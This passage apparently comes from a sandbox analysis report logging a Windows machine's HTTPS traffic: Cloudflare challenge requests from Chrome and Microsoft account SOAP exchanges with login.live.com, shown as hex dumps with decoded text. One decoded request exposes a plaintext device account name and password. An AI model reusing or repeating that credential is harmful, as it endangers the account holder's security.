                                                                          2024-12-08 19:50:50 UTC1369INData Raw: 68 72 62 5a 75 71 62 65 46 75 58 31 75 63 49 4e 54 61 6d 74 73 62 57 35 76 63 48 46 79 63 33 52 31 64 6e 64 34 65 64 65 48 66 49 36 4f 6a 35 43 4b 6e 57 32 45 68 59 61 48 69 49 6d 4b 69 34 79 4e 6a 6f 2f 74 31 74 37 6d 32 66 43 41 6c 35 69 5a 6d 70 75 63 6e 5a 36 66 6f 4b 47 69 6f 36 53 6c 70 75 72 77 37 50 34 45 35 37 51 45 2b 41 6a 6e 78 4c 72 78 74 64 4f 33 7a 4e 53 6b 75 37 79 39 76 72 2f 41 77 63 4c 44 78 4d 58 47 78 38 6a 4a 79 67 38 56 45 53 4d 6f 44 4e 67 71 2b 69 63 51 36 4e 34 57 34 65 50 46 33 4e 33 65 33 2b 44 68 34 75 50 6b 35 65 62 6e 52 74 50 71 36 2b 7a 74 37 75 2f 77 38 66 4c 7a 39 50 55 38 54 6a 35 49 54 77 70 4e 55 45 52 57 52 6c 42 58 4b 45 70 4d 53 46 31 56 58 68 4d 56 4b 50 63 50 45 42 45 53 45 78 51 56 46 6e 51 7a 41 78 6f 62 48 42
                                                                          Data Ascii: hrbZuqbeFuX1ucINTamtsbW5vcHFyc3R1dnd4edeHfI6Oj5CKnW2EhYaHiImKi4yNjo/t1t7m2fCAl5iZmpucnZ6foKGio6Slpurw7P4E57QE+AjnxLrxtdO3zNSku7y9vr/AwcLDxMXGx8jJyg8VESMoDNgq+icQ6N4W4ePF3N3e3+Dh4uPk5ebnRtPq6+zt7u/w8fLz9PU8Tj5ITwpNUERWRlBXKEpMSF1VXhMVKPcPEBESExQVFnQzAxobHB
                                                                          2024-12-08 19:50:50 UTC1369INData Raw: 5a 47 57 38 71 4c 70 70 72 37 32 2b 76 4d 43 59 76 72 66 42 6f 72 61 2f 75 37 72 4d 65 5a 64 37 31 32 64 2b 66 34 43 42 67 6f 4f 45 68 59 61 48 69 49 6d 4b 69 34 79 4e 32 2b 4c 58 71 35 4c 67 35 39 79 69 67 5a 69 5a 6d 70 75 63 6e 5a 36 66 6f 4b 47 69 6f 36 53 6c 70 71 66 39 2b 2f 62 46 72 41 4d 42 2b 37 79 62 73 72 4f 30 74 62 61 33 75 4c 6d 36 75 37 79 39 76 72 2f 41 77 51 38 4e 45 77 76 30 46 2b 4c 4a 46 78 55 62 45 2f 77 66 33 4c 76 53 30 39 54 56 31 74 66 59 32 64 72 62 33 4e 33 65 33 2b 44 68 4a 6a 4d 78 4f 7a 51 32 46 7a 6b 46 36 7a 41 39 4f 30 55 2b 51 43 46 44 41 64 2f 32 39 2f 6a 35 2b 76 76 38 2f 66 34 41 41 51 49 44 42 41 55 47 54 46 70 62 57 56 30 6d 44 56 4e 68 59 6d 42 6b 2f 42 51 56 46 68 63 59 47 52 6f 62 48 42 30 65 48 33 30 38 44 41 30
                                                                          Data Ascii: ZGW8qLppr72+vMCYvrfBora/u7rMeZd712d+f4CBgoOEhYaHiImKi4yN2+LXq5Lg59yigZiZmpucnZ6foKGio6Slpqf9+/bFrAMB+7ybsrO0tba3uLm6u7y9vr/AwQ8NEwv0F+LJFxUbE/wf3LvS09TV1tfY2drb3N3e3+DhJjMxOzQ2FzkF6zA9O0U+QCFDAd/29/j5+vv8/f4AAQIDBAUGTFpbWV0mDVNhYmBk/BQVFhcYGRobHB0eH308DA0
                                                                          2024-12-08 19:50:50 UTC1369INData Raw: 6f 68 73 73 38 4f 39 73 38 57 37 77 73 4a 39 66 33 66 54 59 32 52 37 66 48 31 2b 66 34 43 42 67 6f 4f 45 68 59 62 51 7a 6f 6d 53 79 73 66 4d 79 61 44 4e 7a 70 4b 55 73 62 4b 57 6e 76 4c 6f 78 4d 6e 71 39 72 2f 6f 70 36 47 6f 71 61 54 6b 34 65 62 6a 75 75 66 6f 72 4b 37 4c 7a 4c 43 34 37 41 4d 4b 35 63 61 2b 77 62 6b 57 70 62 79 39 76 72 2f 41 77 63 4c 44 78 4d 58 47 78 38 6a 4a 79 73 73 66 45 79 4d 6c 49 79 44 74 76 64 54 56 31 74 66 59 32 64 72 62 33 4e 33 65 33 7a 37 4c 34 75 50 6b 35 65 62 6e 36 4f 6e 71 36 2b 7a 74 4d 6a 67 39 4e 55 64 4d 4d 50 78 4f 48 30 73 30 44 51 4d 36 2f 52 77 41 56 6c 42 48 53 55 74 50 56 55 31 4e 4a 66 51 4d 44 51 34 50 45 42 45 53 45 78 51 56 46 68 64 68 58 78 6f 6a 58 32 56 71 59 6e 52 35 58 53 70 35 62 6e 31 64 4f 6a 42 6e
                                                                          Data Ascii: ohss8O9s8W7wsJ9f3fTY2R7fH1+f4CBgoOEhYbQzomSysfMyaDNzpKUsbKWnvLoxMnq9r/op6GoqaTk4ebjuuforK7LzLC47AMK5ca+wbkWpby9vr/AwcLDxMXGx8jJyssfEyMlIyDtvdTV1tfY2drb3N3e3z7L4uPk5ebn6Onq6+ztMjg9NUdMMPxOH0s0DQM6/RwAVlBHSUtPVU1NJfQMDQ4PEBESExQVFhdhXxojX2VqYnR5XSp5bn1dOjBn


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          28192.168.2.449781104.18.95.414431012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:50:51 UTC598OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/608171432:1733530697:8BWsYhk1SWZlRP7GpYN7tPMosN7A_9EHlf49BfqZObo/8eef4911a8e143cb/MZci78iv2CCudpo2.FGQ5mZ5Rf0uaBDJlbj5xATahfU-1733687437-1.1.1.1-orHo8b5s0mjHvI02qYmgkSKS324gw5u9MJx4_q2_vPNFnQ_SCLfrUsZYIz4F5ypF HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-12-08 19:50:52 UTC379INHTTP/1.1 404 Not Found
                                                                          Date: Sun, 08 Dec 2024 19:50:52 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 7
                                                                          Connection: close
                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          cf-chl-out: AkKwqzEuh8uUt8JHcRPHDfy+GZLRoZymEFM=$VsnjO48JeSovXAzZ
                                                                          Server: cloudflare
                                                                          CF-RAY: 8eef49709dc278d3-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-12-08 19:50:52 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                          Data Ascii: invalid


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          29192.168.2.44978220.190.147.8443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:02 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                          Connection: Keep-Alive
                                                                          Content-Type: application/soap+xml
                                                                          Accept: */*
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                          Content-Length: 3592
                                                                          Host: login.live.com
                                                                          2024-12-08 19:51:02 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                          2024-12-08 19:51:02 UTC568INHTTP/1.1 200 OK
                                                                          Cache-Control: no-store, no-cache
                                                                          Pragma: no-cache
                                                                          Content-Type: application/soap+xml; charset=utf-8
                                                                          Expires: Sun, 08 Dec 2024 19:50:02 GMT
                                                                          P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                          x-ms-route-info: C533_SN1
                                                                          x-ms-request-id: 1f3260e5-ee1f-46a5-b7dc-0081da90d5da
                                                                          PPServer: PPV: 30 H: SN1PEPF0002FA07 V: 0
                                                                          X-Content-Type-Options: nosniff
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          X-XSS-Protection: 1; mode=block
                                                                          Date: Sun, 08 Dec 2024 19:51:02 GMT
                                                                          Connection: close
                                                                          Content-Length: 1276
                                                                          2024-12-08 19:51:02 UTC1276INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          30192.168.2.44978320.190.147.8443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:04 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                          Connection: Keep-Alive
                                                                          Content-Type: application/soap+xml
                                                                          Accept: */*
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                          Content-Length: 3592
                                                                          Host: login.live.com
                                                                          2024-12-08 19:51:04 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                          2024-12-08 19:51:05 UTC568INHTTP/1.1 200 OK
                                                                          Cache-Control: no-store, no-cache
                                                                          Pragma: no-cache
                                                                          Content-Type: application/soap+xml; charset=utf-8
                                                                          Expires: Sun, 08 Dec 2024 19:50:05 GMT
                                                                          P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                          x-ms-route-info: C533_SN1
                                                                          x-ms-request-id: 553730db-7302-4e44-8e95-8fc35720d941
                                                                          PPServer: PPV: 30 H: SN1PEPF0002F05E V: 0
                                                                          X-Content-Type-Options: nosniff
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          X-XSS-Protection: 1; mode=block
                                                                          Date: Sun, 08 Dec 2024 19:51:04 GMT
                                                                          Connection: close
                                                                          Content-Length: 1276
                                                                          2024-12-08 19:51:05 UTC1276INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          31192.168.2.44978420.190.147.8443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:04 UTC446OUTPOST /ppsecure/deviceaddcredential.srf HTTP/1.0
                                                                          Connection: Keep-Alive
                                                                          Content-Type: application/soap+xml
                                                                          Accept: */*
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                          Content-Length: 7642
                                                                          Host: login.live.com
                                                                          2024-12-08 19:51:04 UTC7642OUTData Raw: 3c 44 65 76 69 63 65 41 64 64 52 65 71 75 65 73 74 3e 3c 43 6c 69 65 6e 74 49 6e 66 6f 20 6e 61 6d 65 3d 22 49 44 43 52 4c 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3e 3c 42 69 6e 61 72 79 56 65 72 73 69 6f 6e 3e 32 34 3c 2f 42 69 6e 61 72 79 56 65 72 73 69 6f 6e 3e 3c 2f 43 6c 69 65 6e 74 49 6e 66 6f 3e 3c 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 3e 3c 4d 65 6d 62 65 72 6e 61 6d 65 3e 30 32 63 69 69 6b 6d 62 69 6c 6f 74 66 6f 71 62 3c 2f 4d 65 6d 62 65 72 6e 61 6d 65 3e 3c 50 61 73 73 77 6f 72 64 3e 71 4b 2e 2c 47 6b 3f 34 71 6a 48 76 6b 4a 36 5e 25 6f 2c 2e 3c 2f 50 61 73 73 77 6f 72 64 3e 3c 2f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 3e 3c 4f 6c 64 4d 65 6d 62 65 72 6e 61 6d 65 3e 30 32 61 6b 71 72 6c 66 67 75 6b 69 6a 65 76 6c 3c 2f 4f 6c 64 4d
                                                                          Data Ascii: <DeviceAddRequest><ClientInfo name="IDCRL" version="1.0"><BinaryVersion>24</BinaryVersion></ClientInfo><Authentication><Membername>02ciikmbilotfoqb</Membername><Password>qK.,Gk?4qjHvkJ6^%o,.</Password></Authentication><OldMembername>02akqrlfgukijevl</OldM
                                                                          2024-12-08 19:51:17 UTC542INHTTP/1.1 200 OK
                                                                          Cache-Control: no-store, no-cache
                                                                          Pragma: no-cache
                                                                          Content-Type: text/xml
                                                                          Expires: Sun, 08 Dec 2024 19:50:05 GMT
                                                                          P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                          x-ms-route-info: C528_BAY
                                                                          x-ms-request-id: 1d63f69f-5044-433e-92a9-8cd7773aef43
                                                                          PPServer: PPV: 30 H: PH1PEPF0001B8B4 V: 0
                                                                          X-Content-Type-Options: nosniff
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          X-XSS-Protection: 1; mode=block
                                                                          Date: Sun, 08 Dec 2024 19:51:16 GMT
                                                                          Connection: close
                                                                          Content-Length: 17166
                                                                          2024-12-08 19:51:17 UTC15842INData Raw: 3c 44 65 76 69 63 65 41 64 64 52 65 73 70 6f 6e 73 65 20 53 75 63 63 65 73 73 3d 22 74 72 75 65 22 3e 3c 73 75 63 63 65 73 73 3e 74 72 75 65 3c 2f 73 75 63 63 65 73 73 3e 3c 70 75 69 64 3e 30 30 31 38 38 30 31 30 37 37 36 31 35 41 42 37 3c 2f 70 75 69 64 3e 3c 44 65 76 69 63 65 54 70 6d 4b 65 79 53 74 61 74 65 3e 33 3c 2f 44 65 76 69 63 65 54 70 6d 4b 65 79 53 74 61 74 65 3e 3c 4c 69 63 65 6e 73 65 20 43 6f 6e 74 65 6e 74 49 44 3d 22 33 32 35 32 62 32 30 63 2d 64 34 32 35 2d 34 37 31 31 2d 38 63 63 35 2d 62 32 66 35 33 63 38 33 30 62 37 36 22 20 49 44 3d 22 32 37 64 64 62 36 34 37 2d 31 65 66 30 2d 34 34 65 37 2d 38 34 39 34 2d 64 35 39 66 30 61 36 34 62 63 63 37 22 20 4c 69 63 65 6e 73 65 49 44 3d 22 33 32 35 32 62 32 30 63 2d 64 34 32 35 2d 34 37 31 31
                                                                          Data Ascii: <DeviceAddResponse Success="true"><success>true</success><puid>0018801077615AB7</puid><DeviceTpmKeyState>3</DeviceTpmKeyState><License ContentID="3252b20c-d425-4711-8cc5-b2f53c830b76" ID="27ddb647-1ef0-44e7-8494-d59f0a64bcc7" LicenseID="3252b20c-d425-4711
                                                                          2024-12-08 19:51:17 UTC1324INData Raw: 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 39 2f 78 6d 6c 64 73 69 67 23 65 6e 76 65 6c 6f 70 65 64 2d 73 69 67 6e 61 74 75 72 65 22 2f 3e 3c 2f 54 72 61 6e 73 66 6f 72 6d 73 3e 3c 44 69 67 65 73 74 4d 65 74 68 6f 64 20 41 6c 67 6f 72 69 74 68 6d 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 30 34 2f 78 6d 6c 65 6e 63 23 73 68 61 32 35 36 22 2f 3e 3c 44 69 67 65 73 74 56 61 6c 75 65 3e 67 74 71 77 70 52 35 66 47 44 61 6f 48 73 4d 37 49 57 47 4b 5a 67 61 77 58 61 30 42 50 69 47 61 65 35 62 49 75 6e 2f 52 51 4a 41 3d 3c 2f 44 69 67 65 73 74 56 61 6c 75 65 3e 3c 2f 52 65 66 65 72 65 6e 63 65 3e 3c 2f 53 69 67 6e 65 64 49 6e 66 6f 3e 3c 53 69 67 6e 61 74 75 72 65 56 61 6c 75 65 3e 41 46 38 6f 46 52 2b 47 66
                                                                          Data Ascii: tp://www.w3.org/2000/09/xmldsig#enveloped-signature"/></Transforms><DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/><DigestValue>gtqwpR5fGDaoHsM7IWGKZgawXa0BPiGae5bIun/RQJA=</DigestValue></Reference></SignedInfo><SignatureValue>AF8oFR+Gf


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          32192.168.2.449785104.18.95.414431012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:06 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/608171432:1733530697:8BWsYhk1SWZlRP7GpYN7tPMosN7A_9EHlf49BfqZObo/8eef4911a8e143cb/MZci78iv2CCudpo2.FGQ5mZ5Rf0uaBDJlbj5xATahfU-1733687437-1.1.1.1-orHo8b5s0mjHvI02qYmgkSKS324gw5u9MJx4_q2_vPNFnQ_SCLfrUsZYIz4F5ypF HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 29171
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          Content-type: application/x-www-form-urlencoded
                                                                          CF-Chl-RetryAttempt: 1
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          CF-Challenge: MZci78iv2CCudpo2.FGQ5mZ5Rf0uaBDJlbj5xATahfU-1733687437-1.1.1.1-orHo8b5s0mjHvI02qYmgkSKS324gw5u9MJx4_q2_vPNFnQ_SCLfrUsZYIz4F5ypF
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Origin: https://challenges.cloudflare.com
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/rgsuz/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-12-08 19:51:06 UTC16384OUTData Raw: 76 5f 38 65 65 66 34 39 31 31 61 38 65 31 34 33 63 62 3d 4e 64 4b 72 77 75 49 51 54 75 54 45 64 4d 51 66 34 79 4d 6f 72 61 72 30 66 49 37 75 52 4d 46 72 4e 4b 56 76 4d 6e 47 4d 39 4b 49 78 4d 4f 72 56 66 73 56 75 4d 61 72 4b 4b 75 2d 30 4b 4d 4e 75 4d 49 53 37 4f 4d 75 55 46 55 55 4d 44 73 75 4a 51 69 79 4d 6b 35 4d 64 79 55 49 48 66 38 30 4b 75 76 63 4d 49 68 54 4d 6f 61 56 4d 4d 24 74 69 33 73 49 65 4e 4d 56 34 4d 44 61 4d 56 45 53 72 4b 41 34 4d 65 35 58 79 5a 39 32 4d 4e 54 5a 6e 6d 31 73 4d 51 33 51 78 48 55 35 35 65 75 32 42 45 72 35 4d 37 33 75 4b 57 6b 77 5a 6d 55 25 32 62 72 59 77 51 53 48 4d 4b 42 37 47 68 6e 30 44 32 37 4d 37 4e 72 57 70 38 6d 4d 56 4e 57 52 75 59 35 43 59 33 2d 73 54 49 4e 37 43 6d 68 42 68 57 6e 5a 68 4f 2d 57 31 56 79 68 54
                                                                          Data Ascii: v_8eef4911a8e143cb=NdKrwuIQTuTEdMQf4yMorar0fI7uRMFrNKVvMnGM9KIxMOrVfsVuMarKKu-0KMNuMIS7OMuUFUUMDsuJQiyMk5MdyUIHf80KuvcMIhTMoaVMM$ti3sIeNMV4MDaMVESrKA4Me5XyZ92MNTZnm1sMQ3QxHU55eu2BEr5M73uKWkwZmU%2brYwQSHMKB7Ghn0D27M7NrWp8mMVNWRuY5CY3-sTIN7CmhBhWnZhO-W1VyhT
                                                                          2024-12-08 19:51:06 UTC12787OUTData Raw: 4d 4b 72 24 55 56 79 49 45 4d 48 72 78 53 69 4d 75 4b 4d 4b 4d 7a 4d 47 64 4b 72 49 6d 46 5a 4d 4e 72 30 50 4d 51 4d 74 76 37 64 49 52 4d 39 72 37 37 4d 70 4d 7a 55 37 32 4d 33 37 49 55 24 34 4d 38 4d 51 55 75 50 49 7a 4d 4d 73 75 45 49 33 4d 6d 73 56 35 49 30 4d 39 72 4d 4d 4d 2b 39 4d 49 4b 49 57 4d 61 55 30 4c 49 37 68 70 54 70 73 75 4a 4d 4b 6f 44 4b 49 6c 66 45 4d 75 30 49 33 74 62 73 37 50 4d 4a 4d 75 55 49 73 75 4e 72 42 34 24 71 4e 5a 4d 30 51 73 51 4e 57 72 62 73 61 58 49 47 55 45 33 72 76 4d 4f 4d 45 4d 30 41 72 30 4d 58 73 4d 76 4d 4c 55 63 4b 30 62 49 6c 66 7a 50 30 64 49 71 4d 34 54 49 72 49 42 55 58 73 75 52 72 4c 55 6b 72 61 58 49 68 72 63 52 4d 66 62 58 4d 4e 51 4d 4b 49 54 73 4b 51 30 41 72 45 4b 4e 50 4d 30 42 66 73 66 4b 30 76 4d 41 54
                                                                          Data Ascii: MKr$UVyIEMHrxSiMuKMKMzMGdKrImFZMNr0PMQMtv7dIRM9r77MpMzU72M37IU$4M8MQUuPIzMMsuEI3MmsV5I0M9rMMM+9MIKIWMaU0LI7hpTpsuJMKoDKIlfEMu0I3tbs7PMJMuUIsuNrB4$qNZM0QsQNWrbsaXIGUE3rvMOMEM0Ar0MXsMvMLUcK0bIlfzP0dIqM4TIrIBUXsuRrLUkraXIhrcRMfbXMNQMKITsKQ0ArEKNPM0BfsfK0vMAT
                                                                          2024-12-08 19:51:06 UTC286INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:06 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 4140
                                                                          Connection: close
                                                                          cf-chl-out: 6YtrjqMvLChPMp9smZyApWKQ0kBDpdzjnw/qnk6YT/NRHSnpDpi2Fy4nkvjs0RO4qDI0BFOk+6S76C5EvmyiohRjYJSJ8Vc0BS4QEmGPeiEEQjpdctQnL32j$FDx+EneMHCIzlLfa
